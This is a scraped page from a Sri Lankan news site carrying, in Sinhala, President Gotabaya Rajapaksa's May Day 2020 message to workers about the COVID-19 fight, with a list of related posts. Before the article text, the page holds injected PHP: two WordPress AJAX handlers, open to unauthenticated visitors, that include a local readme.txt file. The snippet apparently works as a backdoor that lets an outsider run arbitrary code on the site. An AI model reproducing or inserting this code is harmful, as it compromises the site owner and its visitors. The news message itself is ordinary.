if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කොරෝනා සටන නියතවම ජය ගන්නවා..- ජනපතිගෙන් රටටම සුබ පණිවඩයක්… - mediahumanrights.lk
mediahumanrights.lk
News Political

කොරෝනා සටන නියතවම ජය ගන්නවා..- ජනපතිගෙන් රටටම සුබ පණිවඩයක්…

ජනාධිපති ගෝටාභය රාජපක්‍ෂ මහතා විසින් නිකුක් කරන ලද මැයි දැන පණිවුඩය මෙහි දැක්වෙයි.

පණිවුඩය

රට මුහුණ දී ඇති කොවිඩ් 19 අභියෝගය හමුවේ අසීමිත කැපකිරීම් කරන වැඩ කරන ජනතාවට ගෞරවය හා ආචාරය පුද කිරීමට මේ ජාත්‍යන්තර කම්කරු දිනය අවස්ථාවක් කර ගනිමි.

ඉතිහාසය පුරා අප මුහුණ දුන් සහ ජයගත් අභියෝග බොහෝය. ඒ සෑම අවස්ථාවක දීම සෘජු බලපෑමට ලක්වන සහ ඉදිරියෙන් සිටින කණ්ඩායම වන්නෙ රටේ වැඩ කරන ජනතාවය. අතීත සියලූ දුෂ්කර අවස්ථා වැඩ කරන ජනතාව සමග ජයගත් අප කොවිඩ් 19 ද නියත වශයෙන් ජයග්‍රහණය කරබ බව සහතිකය.

ජාත්‍යන්තර කම්කරු දිනය වැඩ කරන ජනතාවගේ එකමුතුකම. ශක්තිය සහ විප්ලවීය ගුණය ලෝකය හමුවේ ප්‍රදර්ශනය කරන අවස්ථාවකි. ලෝක වසංගත තත්ත්වය නිසා එය සමස්ත ලෝක කම්කරු ප්‍රජාවටම මෙවර අහිමිව ඇත. එසේ වුවද වඩා යහපත් හා සාධාරණ සමාජයක් නිර්මාණය කිරීමට ඔවුන් තුළ ඇති අචල අධිෂ්ඨානය නොවෙනස්ව පවතිනු ඇති බව මම විශ්වාස කරමි.

අපේ රජය කුමන අසීරු තත්ත්වයක් හමුවේ වුවද රටේ ශ්‍රමිකයන්ගේ ජන ජීවිතය අඩාල කර නැත. අඩාල වීමට ඉඩ හරින්නේ ද නැත. එසේම වසංගතය පාලනය කරමින් නිෂ්පාදන හා සේවා යන අංශ යාවත්කාලීන කොට වැඩ කරන ජනතාවගේ ජීවින අවස්ථා සුරක්ෂිත කරයි.

පසුගිය වසරේ මැයි දින සැමරුමට මිලේච්ඡ ත්‍රස්ත ප්‍රහාර නිසා සීමා පැනවිණ. අප ඒ මිලේච්ඡත්වයට තිත තැබුව ද අනපේක්ෂිත ලෝක වසංගතය හමුවේ මෙවර ද මැයි දින සැමරුම් උත්සව හා පෙළපාලි නොපැවැත් වෙයි. එසේ වුවද සාධාරණ අයිතීන් උදෙසා කරන අරගලය ශක්තිමත් කළ යුතුය. ශ්‍රී ලාංකේය ජනතාවත් රටේ ආර්ථිකයත් අලුතින් ගොඩ නගන සාමුහික ප්‍රයත්නයට ජාත්‍යන්තර කම්කරු දින ප්‍රාර්ථනය ශක්තිමත් වේවා !

ශ්‍රී ලාංකේය වැඩ කරන ජනතාවට මගේ ආචාරය !

ගෝඨාභය රාජපක්ෂ

2020 අප්‍රේල් මස 30 වන දින

(under the courtesy of lankacnews.com news web)

Related posts

විප්ලවයක ඇරඹුම හෙට සිට – රතන හිමි

Shiran Viraj

'තවම මම තනිකඩයි' තාරුකා වන්නිආරච්චි

Shiran Viraj

දීපවාලි දිනය අද – සැමරුම් නිවසට සීමා කරන්නැයි හින්දු පූජකවරුන්ගෙනුත් ඉල්ලීම්

Shiran Viraj